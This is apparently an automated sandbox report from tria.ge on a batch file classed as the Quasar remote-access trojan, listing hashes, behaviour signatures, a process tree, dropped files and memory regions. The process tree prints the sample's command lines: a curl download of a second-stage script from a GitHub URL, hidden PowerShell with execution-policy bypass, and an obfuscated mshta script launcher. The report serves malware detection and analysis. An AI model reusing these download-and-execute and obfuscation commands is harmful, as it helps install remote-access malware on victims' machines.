Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    35s
  • max time network
    94s
  • platform
    windows11-21h2_x64
  • resource
    win11-20231215-en
  • resource tags

    arch:x64arch:x86image:win11-20231215-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    12/02/2024, 02:23

General

  • Target

    gizmo.bat

  • Size

    13KB

  • MD5

    4f5e2a45a205c03f35cfc258a6fa78c4

  • SHA1

    409cc00e8a84f9feebaaeca597df0e7840433ea7

  • SHA256

    a74b4c512087be32af7863d596f2946ba0e160b863aa3ba2380b85cf6b607a14

  • SHA512

    cc769438aea44a2197708631e5a72f4fdbd6c1ddf0716f98c2eb297cfacfb10c6a3d8dd6f42f6270f47be36b2055ff4cf174c5e131b9fd7ee785bf7f1503a32a

  • SSDEEP

    384:uYfiuv5LxLQ8lWxuzgUKEs7huHSH2vUV2EUbPxCJ0VbHAPVg//9hRaYc5Sjm5FFi:uY6uv5LxLQ8lWxuzgUKEs7huHSH2vUV2

Score
10/10

Malware Config

Extracted

Family

quasar

Attributes
  • reconnect_delay

    3000

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:680
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
      1⤵
        PID:740
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        1⤵
          PID:436
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:992
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\gizmo.bat"
            1⤵
            • Suspicious use of WriteProcessMemory
            PID:484
            • C:\Windows\system32\chcp.com
              chcp.com 437
              2⤵
                PID:700
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c type tmp
                2⤵
                  PID:884
                • C:\Windows\system32\findstr.exe
                  findstr /L /I goto C:\Users\Admin\AppData\Local\Temp\gizmo.bat
                  2⤵
                    PID:4620
                  • C:\Windows\system32\findstr.exe
                    findstr /L /I set C:\Users\Admin\AppData\Local\Temp\gizmo.bat
                    2⤵
                      PID:2528
                    • C:\Windows\system32\findstr.exe
                      findstr /L /I echo C:\Users\Admin\AppData\Local\Temp\gizmo.bat
                      2⤵
                        PID:2688
                      • C:\Windows\system32\findstr.exe
                        findstr /L /I pause C:\Users\Admin\AppData\Local\Temp\gizmo.bat
                        2⤵
                          PID:1068
                        • C:\Windows\system32\find.exe
                          find
                          2⤵
                            PID:2416
                          • C:\Windows\system32\find.exe
                            find
                            2⤵
                              PID:2872
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c type tmp
                              2⤵
                                PID:2312
                              • C:\Windows\system32\curl.exe
                                curl -s -o C:\Users\Admin\AppData\Local\Temp\zen.bat https://raw.githubusercontent.com/bloxiscool/a/main/zen.bat
                                2⤵
                                  PID:3380
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:FuCrQKgolT; "
                                  2⤵
                                    PID:1820
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
                                    2⤵
                                    • Drops file in Windows directory
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4060
                                • C:\Windows\$sxr-mshta.exe
                                  C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-eGPBfRrvpevKrnqohNeQ4312:ZvkurFMC=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
                                  1⤵
                                  • Executes dropped EXE
                                  • Modifies registry class
                                  • Suspicious use of WriteProcessMemory
                                  PID:4268
                                  • C:\Windows\$sxr-cmd.exe
                                    "C:\Windows\$sxr-cmd.exe" /c %$sxr-eGPBfRrvpevKrnqohNeQ4312:ZvkurFMC=%
                                    2⤵
                                    • Executes dropped EXE
                                    • Suspicious use of WriteProcessMemory
                                    PID:1016
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:OpcrxjJLSI; "
                                      3⤵
                                        PID:4616
                                      • C:\Windows\$sxr-powershell.exe
                                        C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass
                                        3⤵
                                        • Executes dropped EXE
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of WriteProcessMemory
                                        PID:3996

                                  Network

                                  MITRE ATT&CK Enterprise v15

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                    Filesize

                                    62KB

                                    MD5

                                    e566632d8956997225be604d026c9b39

                                    SHA1

                                    94a9aade75fffc63ed71404b630eca41d3ce130e

                                    SHA256

                                    b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0

                                    SHA512

                                    f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd

                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1cdb3vzt.ar0.ps1

                                    Filesize

                                    60B

                                    MD5

                                    d17fe0a3f47be24a6453e9ef58c94641

                                    SHA1

                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                    SHA256

                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                    SHA512

                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                  • C:\Users\Admin\AppData\Local\Temp\tmp

                                    Filesize

                                    14B

                                    MD5

                                    ce585c6ba32ac17652d2345118536f9c

                                    SHA1

                                    be0e41b3690c42e4c0cdb53d53fc544fb46b758d

                                    SHA256

                                    589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3

                                    SHA512

                                    d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752

                                  • C:\Users\Admin\AppData\Local\Temp\zen.bat

                                    Filesize

                                    14.9MB

                                    MD5

                                    066512b7d10d9042675312fb97620adf

                                    SHA1

                                    1b346b22a2fb683a982bc63bf011fb34d7f0fbf6

                                    SHA256

                                    d04298a5fa09ad11b5ca40bfa081e5afe363c90ed28af5bcaaec244f3370f468

                                    SHA512

                                    71efe2294cfc27d0326e91645cd7604b0957af79e0455ab1455aeea660daf8540cf2585460ce052b351f9cc140cf85348b30da4a45ec62cdcc2a15fbc4d8e3e9

                                  • C:\Windows\$sxr-cmd.exe

                                    Filesize

                                    324KB

                                    MD5

                                    c5db7b712f280c3ae4f731ad7d5ea171

                                    SHA1

                                    e8717ff0d40e01fd3b06de2aa5a401bed1c907cc

                                    SHA256

                                    f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba

                                    SHA512

                                    bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89

                                  • C:\Windows\$sxr-mshta.exe

                                    Filesize

                                    32KB

                                    MD5

                                    356e04e106f6987a19938df67dea0b76

                                    SHA1

                                    f2fd7cde5f97427e497dfb07b7f682149dc896fb

                                    SHA256

                                    4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e

                                    SHA512

                                    df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd

                                  • C:\Windows\$sxr-powershell.exe

                                    Filesize

                                    86KB

                                    MD5

                                    88c6d7ac3e9adeccc59987bd3ddb460a

                                    SHA1

                                    5475cd2db17ca94e7df4358644d4bade91b6d5a2

                                    SHA256

                                    959ea7a4e19f90488dd8d9098c41107231265c620818d7915768c05f306d7606

                                    SHA512

                                    0fe82f5c53f9c26d49637005ee3d6e28d10e7e9db864e4a6b0f50893ffb7c1176dcdf914e4f3ee73c2eeebbc43c5faa00e5683bd0e11ad8afd01af042a92b865

                                  • memory/436-124-0x000001AB5E520000-0x000001AB5E549000-memory.dmp

                                    Filesize

                                    164KB

                                  • memory/436-121-0x00007FFA8BED0000-0x00007FFA8BEE0000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/436-122-0x000001AB5E520000-0x000001AB5E549000-memory.dmp

                                    Filesize

                                    164KB

                                  • memory/680-106-0x0000022B3C280000-0x0000022B3C2A9000-memory.dmp

                                    Filesize

                                    164KB

                                  • memory/680-107-0x00007FFA8BED0000-0x00007FFA8BEE0000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/680-108-0x0000022B3C280000-0x0000022B3C2A9000-memory.dmp

                                    Filesize

                                    164KB

                                  • memory/680-110-0x0000022B3C280000-0x0000022B3C2A9000-memory.dmp

                                    Filesize

                                    164KB

                                  • memory/680-112-0x00007FFACBEE4000-0x00007FFACBEE5000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/680-105-0x0000022B3C250000-0x0000022B3C272000-memory.dmp

                                    Filesize

                                    136KB

                                  • memory/740-131-0x00007FFA8BED0000-0x00007FFA8BEE0000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/740-132-0x0000022403B70000-0x0000022403B99000-memory.dmp

                                    Filesize

                                    164KB

                                  • memory/740-133-0x0000022403B70000-0x0000022403B99000-memory.dmp

                                    Filesize

                                    164KB

                                  • memory/740-135-0x0000022403B70000-0x0000022403B99000-memory.dmp

                                    Filesize

                                    164KB

                                  • memory/992-117-0x0000017CBBE60000-0x0000017CBBE89000-memory.dmp

                                    Filesize

                                    164KB

                                  • memory/992-125-0x0000017CBBE60000-0x0000017CBBE89000-memory.dmp

                                    Filesize

                                    164KB

                                  • memory/992-116-0x0000017CBBE60000-0x0000017CBBE89000-memory.dmp

                                    Filesize

                                    164KB

                                  • memory/992-115-0x00007FFA8BED0000-0x00007FFA8BEE0000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/1048-141-0x00000258D4C60000-0x00000258D4C89000-memory.dmp

                                    Filesize

                                    164KB

                                  • memory/1048-140-0x00000258D4C60000-0x00000258D4C89000-memory.dmp

                                    Filesize

                                    164KB

                                  • memory/1048-139-0x00007FFA8BED0000-0x00007FFA8BEE0000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/1048-146-0x00000258D4C60000-0x00000258D4C89000-memory.dmp

                                    Filesize

                                    164KB

                                  • memory/1092-149-0x000001964BC60000-0x000001964BC89000-memory.dmp

                                    Filesize

                                    164KB

                                  • memory/1092-145-0x00007FFA8BED0000-0x00007FFA8BEE0000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/1092-147-0x000001964BC60000-0x000001964BC89000-memory.dmp

                                    Filesize

                                    164KB

                                  • memory/1140-154-0x000001BA6BFD0000-0x000001BA6BFF9000-memory.dmp

                                    Filesize

                                    164KB

                                  • memory/1140-155-0x000001BA6BFD0000-0x000001BA6BFF9000-memory.dmp

                                    Filesize

                                    164KB

                                  • memory/1140-157-0x000001BA6BFD0000-0x000001BA6BFF9000-memory.dmp

                                    Filesize

                                    164KB

                                  • memory/1140-153-0x00007FFA8BED0000-0x00007FFA8BEE0000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/1184-161-0x00007FFA8BED0000-0x00007FFA8BEE0000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/1184-164-0x0000021EDE6E0000-0x0000021EDE709000-memory.dmp

                                    Filesize

                                    164KB

                                  • memory/1184-163-0x0000021EDE6E0000-0x0000021EDE709000-memory.dmp

                                    Filesize

                                    164KB

                                  • memory/3996-83-0x00007FFACBE40000-0x00007FFACC049000-memory.dmp

                                    Filesize

                                    2.0MB

                                  • memory/3996-98-0x00000215C6580000-0x00000215C65C0000-memory.dmp

                                    Filesize

                                    256KB

                                  • memory/3996-160-0x00007FFACBE40000-0x00007FFACC049000-memory.dmp

                                    Filesize

                                    2.0MB

                                  • memory/3996-65-0x00007FFAAB030000-0x00007FFAABAF2000-memory.dmp

                                    Filesize

                                    10.8MB

                                  • memory/3996-67-0x000002159B6D0000-0x000002159B6E0000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/3996-74-0x000002159B6D0000-0x000002159B6E0000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/3996-148-0x00007FFACBE40000-0x00007FFACC049000-memory.dmp

                                    Filesize

                                    2.0MB

                                  • memory/3996-134-0x000002159B6D0000-0x000002159B6E0000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/3996-79-0x000002159B6D0000-0x000002159B6E0000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/3996-80-0x00000215BBC00000-0x00000215BC29C000-memory.dmp

                                    Filesize

                                    6.6MB

                                  • memory/3996-81-0x00000215C42A0000-0x00000215C4988000-memory.dmp

                                    Filesize

                                    6.9MB

                                  • memory/3996-82-0x00007FFACAEE0000-0x00007FFACAF9D000-memory.dmp

                                    Filesize

                                    756KB

                                  • memory/3996-130-0x000002159B6D0000-0x000002159B6E0000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/3996-127-0x000002159B6D0000-0x000002159B6E0000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/3996-85-0x00007FFACBE40000-0x00007FFACC049000-memory.dmp

                                    Filesize

                                    2.0MB

                                  • memory/3996-86-0x00007FFACBE40000-0x00007FFACC049000-memory.dmp

                                    Filesize

                                    2.0MB

                                  • memory/3996-87-0x00007FFACBE40000-0x00007FFACC049000-memory.dmp

                                    Filesize

                                    2.0MB

                                  • memory/3996-88-0x0000021583340000-0x0000021583346000-memory.dmp

                                    Filesize

                                    24KB

                                  • memory/3996-89-0x00000215A3A60000-0x00000215A3A66000-memory.dmp

                                    Filesize

                                    24KB

                                  • memory/3996-90-0x00000215C4EC0000-0x00000215C5408000-memory.dmp

                                    Filesize

                                    5.3MB

                                  • memory/3996-91-0x00000215C5410000-0x00000215C5BB4000-memory.dmp

                                    Filesize

                                    7.6MB

                                  • memory/3996-93-0x00000215C5F40000-0x00000215C5FF2000-memory.dmp

                                    Filesize

                                    712KB

                                  • memory/3996-92-0x00000215C5BB0000-0x00000215C5F38000-memory.dmp

                                    Filesize

                                    3.5MB

                                  • memory/3996-123-0x00007FFAAB030000-0x00007FFAABAF2000-memory.dmp

                                    Filesize

                                    10.8MB

                                  • memory/3996-102-0x0000000180000000-0x0000000180007000-memory.dmp

                                    Filesize

                                    28KB

                                  • memory/3996-97-0x00000215C63F0000-0x00000215C645A000-memory.dmp

                                    Filesize

                                    424KB

                                  • memory/4060-39-0x0000020DFF050000-0x0000020DFF0A8000-memory.dmp

                                    Filesize

                                    352KB

                                  • memory/4060-47-0x0000000180000000-0x0000000180007000-memory.dmp

                                    Filesize

                                    28KB

                                  • memory/4060-44-0x0000020DDBE00000-0x0000020DDBE10000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/4060-43-0x0000020DDBE00000-0x0000020DDBE10000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/4060-42-0x00007FFAAB030000-0x00007FFAABAF2000-memory.dmp

                                    Filesize

                                    10.8MB

                                  • memory/4060-41-0x00007FF709370000-0x00007FF7093DE000-memory.dmp

                                    Filesize

                                    440KB

                                  • memory/4060-40-0x0000020DFF0B0000-0x0000020DFF0DE000-memory.dmp

                                    Filesize

                                    184KB

                                  • memory/4060-53-0x00007FFAAA7A8000-0x00007FFAAA7A9000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/4060-38-0x0000020DFF010000-0x0000020DFF046000-memory.dmp

                                    Filesize

                                    216KB

                                  • memory/4060-37-0x0000020DFEF60000-0x0000020DFF012000-memory.dmp

                                    Filesize

                                    712KB

                                  • memory/4060-36-0x0000020DFE340000-0x0000020DFEF60000-memory.dmp

                                    Filesize

                                    12.1MB

                                  • memory/4060-95-0x00007FFAAB030000-0x00007FFAABAF2000-memory.dmp

                                    Filesize

                                    10.8MB

                                  • memory/4060-35-0x0000020DFE300000-0x0000020DFE33E000-memory.dmp

                                    Filesize

                                    248KB

                                  • memory/4060-34-0x0000020DF4190000-0x0000020DF4196000-memory.dmp

                                    Filesize

                                    24KB

                                  • memory/4060-84-0x00007FFACBE40000-0x00007FFACC049000-memory.dmp

                                    Filesize

                                    2.0MB

                                  • memory/4060-33-0x0000020DF41B0000-0x0000020DF41B8000-memory.dmp

                                    Filesize

                                    32KB

                                  • memory/4060-32-0x0000020DDBD90000-0x0000020DDBD96000-memory.dmp

                                    Filesize

                                    24KB

                                  • memory/4060-46-0x0000020DF41C0000-0x0000020DF41C8000-memory.dmp

                                    Filesize

                                    32KB

                                  • memory/4060-31-0x0000020DFE2A0000-0x0000020DFE2F8000-memory.dmp

                                    Filesize

                                    352KB

                                  • memory/4060-96-0x00007FFACBE40000-0x00007FFACC049000-memory.dmp

                                    Filesize

                                    2.0MB

                                  • memory/4060-30-0x0000020DF4220000-0x0000020DF427E000-memory.dmp

                                    Filesize

                                    376KB

                                  • memory/4060-29-0x0000020DF41A0000-0x0000020DF41A6000-memory.dmp

                                    Filesize

                                    24KB

                                  • memory/4060-28-0x0000020DDBD70000-0x0000020DDBD92000-memory.dmp

                                    Filesize

                                    136KB

                                  • memory/4060-27-0x0000020DFE1A0000-0x0000020DFE29C000-memory.dmp

                                    Filesize

                                    1008KB

                                  • memory/4060-26-0x00007FFACBE40000-0x00007FFACC049000-memory.dmp

                                    Filesize

                                    2.0MB

                                  • memory/4060-25-0x00007FFACBE40000-0x00007FFACC049000-memory.dmp

                                    Filesize

                                    2.0MB

                                  • memory/4060-24-0x00007FFACBE40000-0x00007FFACC049000-memory.dmp

                                    Filesize

                                    2.0MB

                                  • memory/4060-23-0x00007FFACBE40000-0x00007FFACC049000-memory.dmp

                                    Filesize

                                    2.0MB

                                  • memory/4060-22-0x00007FFACAEE0000-0x00007FFACAF9D000-memory.dmp

                                    Filesize

                                    756KB

                                  • memory/4060-21-0x0000020DFD3A0000-0x0000020DFDE8C000-memory.dmp

                                    Filesize

                                    10.9MB

                                  • memory/4060-20-0x0000020DFC900000-0x0000020DFD3A0000-memory.dmp

                                    Filesize

                                    10.6MB

                                  • memory/4060-19-0x0000020DF41D0000-0x0000020DF4216000-memory.dmp

                                    Filesize

                                    280KB

                                  • memory/4060-18-0x0000020DDBE00000-0x0000020DDBE10000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/4060-72-0x00007FFACBE40000-0x00007FFACC049000-memory.dmp

                                    Filesize

                                    2.0MB

                                  • memory/4060-17-0x0000020DDBE00000-0x0000020DDBE10000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/4060-16-0x0000020DDBE00000-0x0000020DDBE10000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/4060-50-0x0000020DDBE00000-0x0000020DDBE10000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/4060-15-0x00007FFAAB030000-0x00007FFAABAF2000-memory.dmp

                                    Filesize

                                    10.8MB

                                  • memory/4060-14-0x0000020DF40F0000-0x0000020DF4112000-memory.dmp

                                    Filesize

                                    136KB